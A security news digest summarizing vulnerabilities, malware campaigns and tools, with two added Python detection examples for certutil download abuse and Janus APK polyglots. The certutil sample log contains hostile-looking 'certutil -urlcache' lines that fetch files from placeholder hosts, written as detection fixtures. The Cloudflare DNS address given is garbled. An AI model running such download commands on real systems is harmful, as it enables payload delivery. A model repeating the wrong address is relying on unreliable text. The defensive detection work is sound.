The U.S. Secret Service is warning about a new scam scheme where crooks intercept new debit cards in the mail and replace the chips on the cards with chips from old cards. Once the owners activate the cards, the crooks use the stolen chips for their financial gain.
Russian state regulator Roskomnadzor has ordered the Telegram messaging application to be blocked, 48 hours after it missed a deadline to give up the encryption keys to its users' online conversations. I am not sure whether the Telegram protocol is actually blocked in Russia now.
The new Android P version will enforce TLS-secured connections for applications by default.
Kudelski Security published a walk-through guide to Manger's attack against RSA-OAEP. A 1-bit leak from the oracle suffices to decrypt ciphertexts.
In-depth article about stealing FUZE credit card content via Bluetooth.
Understanding Code Signing Abuse in Malware Campaigns. Pretty good statistics.
There is a vulnerability that bypasses the tamper protection provided by Sophos Endpoint Protection v10.7: the protection mechanism can be bypassed by deleting an unprotected registry key.
Several vulnerabilities have been found in the Apache HTTPD server. Update now.
The Microsoft Windows tool certutil.exe, intended for displaying certification authority information, can be used to fetch data from the internet in a similar fashion to WGET or CURL.
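From the defender's side, the useful response to the certutil item is to alert on the download use of a tool that otherwise only inspects certificates. The following is an added example (not code from the original digest or from any of the linked posts) that runs a simple detection over constructed process-creation events: it flags certutil.exe invocations whose arguments contain a URL or the -urlcache verb, and raises the severity when the parent process is an Office application. The flat "key=value|key=value" event format, the OFFICE_PARENTS list, and all hostnames and paths in the sample are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample of Windows process-creation events, flattened into
# "Key=Value|Key=Value" lines (the fields Sysmon Event ID 1 / 4688 carry).
# Not real telemetry; hostnames and paths are made up for the example.
SAMPLE_PROCESS_EVENTS = """\
Image=C:\\Windows\\System32\\certutil.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=certutil.exe -verify server.cer
Image=C:\\Windows\\System32\\certutil.exe|ParentImage=C:\\Windows\\explorer.exe|CommandLine=certutil.exe -dump C:\\certs\\ca.cer
Image=C:\\Windows\\System32\\certutil.exe|ParentImage=C:\\Program Files\\Office\\WINWORD.EXE|CommandLine=certutil.exe -urlcache -f http://files.example.test/update.dat update.dat
Image=C:\\Windows\\System32\\certutil.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=certutil.exe -urlcache -f https://203.0.113.7/x.png x.exe
Image=C:\\Windows\\System32\\curl.exe|ParentImage=C:\\Windows\\System32\\cmd.exe|CommandLine=curl.exe https://www.example.test/
"""

URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)

# Assumed list: an Office binary spawning certutil.exe points at a document-borne loader.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")


@dataclass
class Finding:
    command_line: str
    parent: str
    reasons: list = field(default_factory=list)


def parse_event(line):
    """Split one flattened event line into a dict of its fields."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def detect_certutil_download(log_text):
    """Return a Finding for every certutil.exe execution that looks like a download."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        image = ev.get("Image", "").lower()
        if not image.endswith("\\certutil.exe"):
            continue
        cmd = ev.get("CommandLine", "")
        reasons = []
        if URL_RE.search(cmd):
            reasons.append("url-in-arguments")   # certutil's legitimate CA lookups rarely take a raw URL
        if "-urlcache" in cmd.lower():
            reasons.append("urlcache-verb")      # the verb that makes certutil fetch a URL
        if not reasons:
            continue
        parent = ev.get("ParentImage", "")
        if parent.lower().rsplit("\\", 1)[-1] in OFFICE_PARENTS:
            reasons.append("office-parent")
        findings.append(Finding(cmd, parent, reasons))
    return findings


if __name__ == "__main__":
    for f in detect_certutil_download(SAMPLE_PROCESS_EVENTS):
        print(", ".join(f.reasons), "<-", f.command_line)
```

The two certificate-inspection invocations in the sample are not flagged; only the two invocations carrying a URL are, and the one launched from WINWORD.EXE carries the extra office-parent reason. In a real deployment the same logic would sit in the SIEM's rule language, and application control or egress filtering would complement the alert.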
There is a paper about breaking the 256-bit security level of WalnutDSA (a NIST post-quantum candidate) in under a minute.
Snallygaster - a tool to scan for secrets on web servers.
Nice map of current Linux kernel defenses. The map shows the relations between vulnerability classes, current kernel defenses and bug detection mechanisms.
There is a critical flaw in the Microsoft Malware Protection Engine (CVE-2018-0986). They used the open source unrar code and changed all the signed ints, breaking the code. The result is remote SYSTEM memory corruption.
Blog by Latacora about the right choices and parameters when dealing with cryptography for backups, communication, authentication, etc. Nice summary, with explanations and historical references.
The Italian football club Lazio has been scammed by a social engineering attack via email. The club sent a transfer payment of €2 million to a fraudster's bank account instead of to the Dutch club Feyenoord.
The people behind the Google Wycheproof project, which tests crypto libraries against known attacks, released test vectors for many crypto primitives.
Cloudflare announced a consumer DNS service at the address 184.108.40.206. It supports DNS-over-TLS and also DNS-over-HTTPS.
Good explanatory blog about Oblivious DNS and why DNS should not require our trust at all.
There is a local privilege escalation vulnerability (CVE-2018-0492) in the Debian beep package. Yes, the beep package for motherboard speaker beeping. Escalation is possible because of setuid plus a race condition.
LibreSSL 2.7.0 was accepting all invalid host names as correct. The vulnerability was found by Python maintainer Christian Heimes when running tests after porting the new LibreSSL to Python 3.7. Nobody was affected.
VirusTotal launched a new Android sandbox system, VirusTotal Droidy, to help security researchers detect malicious apps based on behavioral analysis.
MesaLink is a new memory-safe and OpenSSL-compatible TLS library written in Rust.
Fidelis Cybersecurity researcher Jason Reaves demonstrated how to covertly exchange data using X.509 digital certificates. The proof-of-concept code uses the SubjectKeyIdentifier field and generates certificates on the fly.
The "UDPoS" point-of-sale malware uses DNS traffic to exfiltrate stolen credit card data.
Talos analyzed the malware that targeted Olympic computer systems during the opening ceremony. Its main purpose was information gathering and destroying the systems.
A zero-day vulnerability in the Bitmessage messaging client was exploited to steal Electrum cryptocurrency wallet keys.
Trustwave analyzed a multi-stage Microsoft Word attack which does NOT use macros. Really creative technique.
Microsoft can't fix a Skype privilege escalation bug without a massive code rewrite, so they postponed it for a while.
Facebook is advertising its Onavo VPN application, but there are a few reasons why it is really not a good idea to use it.
Facebook is spamming users via the phone numbers they registered for two-factor authentication (2FA), and then posts their SMS responses on their wall.
(Not only) performance analysis of the Retpoline mitigation for the Spectre vulnerability.
A guide on how to brute-force Linux Full Disk Encryption (LUKS) volumes using the Hashcat software.
Proof of concept of a LibreOffice remote arbitrary file disclosure vulnerability. It is possible to silently send any file. All operating systems are affected on versions before 5.4.5/6.0.1.
A.P. Moller-Maersk Group, the world's largest container shipping company, reinstalled 45,000 PCs and 4,000 servers to recover from the NotPetya ransomware attack.
The U.S. Secret Service is warning financial institutions that ATM jackpotting attacks are targeting cash machines in the United States. Attackers are able to empty Diebold Nixdorf and possibly other ATMs with malware, an endoscope and social engineering skills.
Microsoft disabled the Spectre software mitigation released earlier this month due to system instability.
Data from the fitness tracking app Strava gives away the location of sensitive sites like army bases.
China built the African Union building for free, but the building is riddled with microphones, and its computers were transmitting all voice data back to servers in Shanghai.
Journalist Marc Miller interviewed one of the hackers of the ICEMAN group behind the "Emmental" phishing campaign targeting bank clients.
Errata Security blog about the political nature of cyber attack attribution. Mostly about the WannaCry and North Korea connection, but it is a good overview of attribution bias in general.
Great article about the largest malvertising campaign of last year. The so-called Zirconium group operated up to 30 different ad agencies, which enabled them to redirect users to exploit kits, malware downloads and click-fraud websites.
AutoSploit is an automated exploitation tool written in Python. It is able to search for targets using the Shodan.io API and exploit them with Metasploit.
Crooks hacked Fox-IT by taking over the fox-it.com DNS record, then obtained a certificate and executed a man-in-the-middle attack on connections.
Mandiant (FireEye) analyzed an incident at a critical infrastructure organization where an attacker deployed the so-called TRITON malware, designed to manipulate industrial safety systems. According to the analysis, "the malware was delivered as a Py2EXE compiled python script [...] containing standard Python libraries, open source libraries, as well as the attacker-developed Triconex attack framework for interacting with the Triconex controllers."
The anonymous researcher behind the massive internet scans of IoT devices, known from the BrickerBot case, published some insights on his operation. Looks like he is a gray hat after all.
Google published an Android security roadmap for the next year. There will be lots of improvements and new requirements for app developers.
Multiple vulnerabilities were identified in Telegram messenger for Android, like arbitrary file overwrite on receiving files and directory traversal. There are definitely better alternatives to this software...
A guy uploaded his self-signed malformed certificate to websites which process certificates and found out that lots of them are vulnerable to XSS injection.
Mavinject is a legitimate Windows component, digitally signed by Microsoft, that can be abused to inject any DLL into a running process.
Microsoft pushed comprehensive audit reports on Windows events to GitHub.
The "Janus" Android vulnerability (CVE-2017-13156) allows attackers to modify the code in applications without affecting their signatures. The root of the problem is that a file can be a valid APK file and a valid DEX file at the same time. The vulnerability allows attackers to inject malware into a legitimate application while avoiding detection.
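The polyglot at the heart of Janus is easy to check for on the defender's side, because a well-formed APK always begins with a ZIP local file header while a DEX file begins with the "dex\n" magic, and a ZIP parser will still happily read an archive that has foreign bytes prepended to it. The following is an added example (not code from the original digest or from the Janus write-up): it builds a tiny APK-like archive in memory, prepends a constructed DEX header to imitate the polyglot layout, shows that Python's zipfile still lists the archive's entries, and flags the file because it starts with DEX magic yet contains ZIP structure. The archive contents and the 32-byte pseudo-DEX header are constructed for the example and are not a real DEX file.

```python
import io
import zipfile

DEX_MAGIC_PREFIX = b"dex\n"       # real DEX files start with "dex\n" + 3-digit version + NUL
ZIP_LOCAL_HEADER = b"PK\x03\x04"  # every well-formed APK starts with a ZIP local file header
ZIP_EOCD = b"PK\x05\x06"          # end-of-central-directory record the ZIP parser searches for


def inspect_apk_bytes(data):
    """Classify the file by what its head and tail claim to be."""
    # The EOCD record must sit within the last 22 + 65535 bytes (max comment length).
    has_zip_eocd = ZIP_EOCD in data[-65557:]
    starts_with_dex = data.startswith(DEX_MAGIC_PREFIX)
    starts_with_zip = data.startswith(ZIP_LOCAL_HEADER)
    return {
        "zip_structure_present": has_zip_eocd,
        "starts_with_zip_header": starts_with_zip,
        "starts_with_dex_magic": starts_with_dex,
        # A file that is a DEX by its header and a ZIP by its tail is the Janus shape.
        "janus_style_polyglot": has_zip_eocd and starts_with_dex,
    }


def zip_entries(data):
    """What a ZIP parser sees: it locates the EOCD from the end and ignores leading bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def build_sample_apk(prepend_dex_header):
    """Constructed sample: a minimal archive, optionally with a pseudo-DEX header in front."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", "<manifest/>")
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 8)   # placeholder, not real DEX
    apk = buf.getvalue()
    if prepend_dex_header:
        # Constructed 32-byte header: DEX magic followed by zero padding. A real Janus
        # file carries a complete DEX in front; the detection only needs the magic.
        apk = b"dex\n035\x00" + b"\x00" * 24 + apk
    return apk


if __name__ == "__main__":
    for tag, sample in (("clean", build_sample_apk(False)), ("polyglot", build_sample_apk(True))):
        print(tag, inspect_apk_bytes(sample), zip_entries(sample))
```

The practical mitigation is the one Google shipped: APK Signature Scheme v2 signs the whole file rather than individual ZIP entries, so prepended bytes break the signature. The head-of-file check above is what a gateway or app-vetting pipeline can do for APKs that are still only v1-signed.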
According to research by Hanno Böck, Juraj Somorovsky and Craig Young, Bleichenbacher's attack on RSA PKCS#1 v1.5 encryption still works on almost 3% of the Alexa top million most visited websites. The researchers were even able to sign a message using Facebook's private TLS key. Vendors like Citrix, F5 and Cisco, and multiple SSL implementations, are affected.
HP had a keylogger in a touchpad driver, which was disabled by default but could be enabled by setting a registry value.
There is a remote root code execution flaw (CVE-2017-15944) in Palo Alto Networks firewalls.
Researchers from Group-IB spotted the operations of the Russian-speaking MoneyTaker group, which stole as much as $10 million from US and Russian banks.
Recorded Future analyzed the costs of various cybercriminal services sold on dark markets.
Internet traffic for organizations such as Google, Apple, Facebook, Microsoft and Twitch was briefly rerouted to Russia.
Microsoft started rolling out an update for the Malware Protection Engine to fix a remotely exploitable bug discovered by the British intelligence agency.
Avast open-sourced RetDec, a machine-code decompiler for platform-independent analysis of executable files. It's based on LLVM.
Wireless network sniffer Kismet now supports the DJI DroneID UAV telemetry extensions.
Wazuh - Wazuh helps you gain deeper security visibility into your infrastructure by monitoring hosts at the operating system and application level.
It supports log management and analysis, integrity monitoring, anomaly detection and compliance monitoring.
Wifiphisher is an automated tool for victim-customized phishing attacks against Wi-Fi clients.
Multiple critical vulnerabilities were found in the Intel Management Engine, Trusted Execution Engine and Server Platform Services by an Intel audit after third-party researchers reported a privilege escalation vulnerability.
If you have a vulnerable F5, attackers can basically sign anything with your RSA private key. An F5 BIG-IP virtual server configured with a Client SSL profile may be vulnerable to an adaptive chosen ciphertext attack (AKA Bleichenbacher attack) against RSA, which, when exploited, may result in plaintext recovery of encrypted messages.
MalwareHunterTeam discovered a new variant of the CryptoMix ransomware. It uses hardcoded RSA keys and can work offline.
Attackers are using the Dynamic Data Exchange (DDE) protocol of Microsoft Office documents to download and install malware. Microsoft does not consider it a vulnerability.
Nice step-by-step guide on how to put shellcode into a legitimate PE file and make it undetectable.
Extensive review of U2F hardware devices.
al-khaser is a PoC malware with good intentions that aims to stress your anti-malware system. It performs a bunch of current malware tricks, and the goal is to see whether it stays under the radar.
Puffs is a domain-specific language and library for parsing untrusted file formats safely. Examples of such file formats include images, audio, video, fonts and compressed archives.
SensePost researchers found out that the Microsoft Office home page is able to compromise a user by loading an ActiveX component with VBScript.
Microsoft's security department was contacted by a worried user who found two seemingly identical µTorrent executables with valid digital signatures but different cryptographic hashes. As they found out, there was a marketing campaign identifier in "a text file inside a ZIP file inside a PE file, BASE64 encoded and injected in the digital signature of a PE file." Quite complicated...
A vulnerability (CVE-2017-15361) in the generation of RSA keys by a software library used in cryptographic smartcards, security tokens and other secure hardware chips manufactured by Infineon Technologies AG allows a practical factorization attack, in which the attacker computes the private part of an RSA key. The attack is feasible for commonly used key lengths, including 1024 and 2048 bits, and affects chips manufactured as early as 2012 that are now commonplace.
The rolling codes in electronic keys for the Subaru Forester (2009) and some other models are not random. Keys can be cloned and cars unlocked with $25 worth of hardware. https://github.com/tomwimmenhove/subarufobrob
Microsoft reintroduced a pool-based overflow kernel vulnerability in the Windows 10 x64 (RS2) Creators Update which was originally patched in 2016. The authors wrote an exploit with a rich explanation.
Blog about "Exploding Git Repositories" that will crash your git process.
MediaTek and Broadcom Wi-Fi AP drivers have a weak random number generator, allowing prediction of the Group Temporal Key. A practical attack requires a LOT of handshakes.
How to hide a process from Sysinternals tools without admin rights, but with privilege escalation.
Adam Langley blogged about low-level testing of FIDO U2F security keys, namely Yubico, VASCO SecureClick, Feitian ePass, Thetis, U2F Zero and KEY-ID / HyperFIDO.
Good introductory blog about the (in)security of Intel Boot Guard. The author also published the source code of UEFITool with visual validation of Intel Boot Guard coverage.
A script that tests whether access points are affected by Key Reinstallation Attacks (CVE-2017-13082) was published on GitHub by researcher Mathy Vanhoef.
Miscreant is a misuse-resistant symmetric encryption library supporting the AES-SIV (RFC 5297) and CHAIN/STREAM constructions.
There is a great probability that if you used Outlook's S/MIME encryption in the past 6 months, the plaintext of your emails was leaked to the mail exchange because of the Outlook S/MIME vulnerability CVE-2017-11776.
Kaspersky anti-virus was allegedly stealing NSA secrets using a silent signature mode that detected classified documents. Israel hacked Kaspersky and notified the NSA.
The custom OxygenOS Android fork that comes installed on all OnePlus smartphones is tracking users, allowing OnePlus to connect each phone to its customer.
Chromebooks and Chromeboxes are affected by a bug in certain Infineon Trusted Platform Module (TPM) firmware versions. RSA keys generated by the TPM are vulnerable to a computationally expensive attack. Targeted attacks are possible.
The KovCoreG hacking group used an advertising network on Pornhub to redirect users to fake browser update websites that installed malware.
Apple released a security patch for macOS High Sierra 10.13 to fix vulnerabilities in Apple File System (APFS) volumes and the Keychain software. The patch also addresses a flaw in APFS that exposes an encrypted drive's password in the hint box.
Yet another part of the reverse engineering blog post series analyzing TrickBot with IDA.
Keybase launched a nice new feature: encrypted Git. There are no services like a website, pull requests, issue tracking or wiki, just plain git. Encrypted.
Security researcher Gal Beniamini from Google discovered a security vulnerability (CVE-2017-11120) in Apple's iPhone and other devices that use Broadcom Wi-Fi chips, and published a working exploit after notifying the affected parties.
Google engineers also found multiple flaws and vulnerabilities in the popular DNS software package Dnsmasq. The patches are now committed to the project's git repository. Make sure to upgrade to v2.78.
Arbor Networks researchers attributed the Flusihoc DDoS botnet to Chinese origins. More than 154 different command and control servers were used over the years, with over 48 still active right now.
HP Enterprise shared ArcSight source code with the Russians.
A vulnerability in Siemens industrial switches allows an unauthenticated attacker with access to the network to remotely perform administrative actions.
Computer manufacturer Purism is currently running a crowdfunding campaign to finance the Librem 5, a security and privacy focused phone.
From the campaign webpage:
"Librem 5, the phone that focuses on security by design and privacy protection by default. Running Free/Libre and Open Source software and a GNU+Linux Operating System designed to create an open development utopia, rather than the walled gardens from all other phone providers."
Microsoft announced a new cloud-based memory corruption bug detector with the codename Project Springfield.
Super-Stealthy Droppers - Linux "diskless" binary execution by example.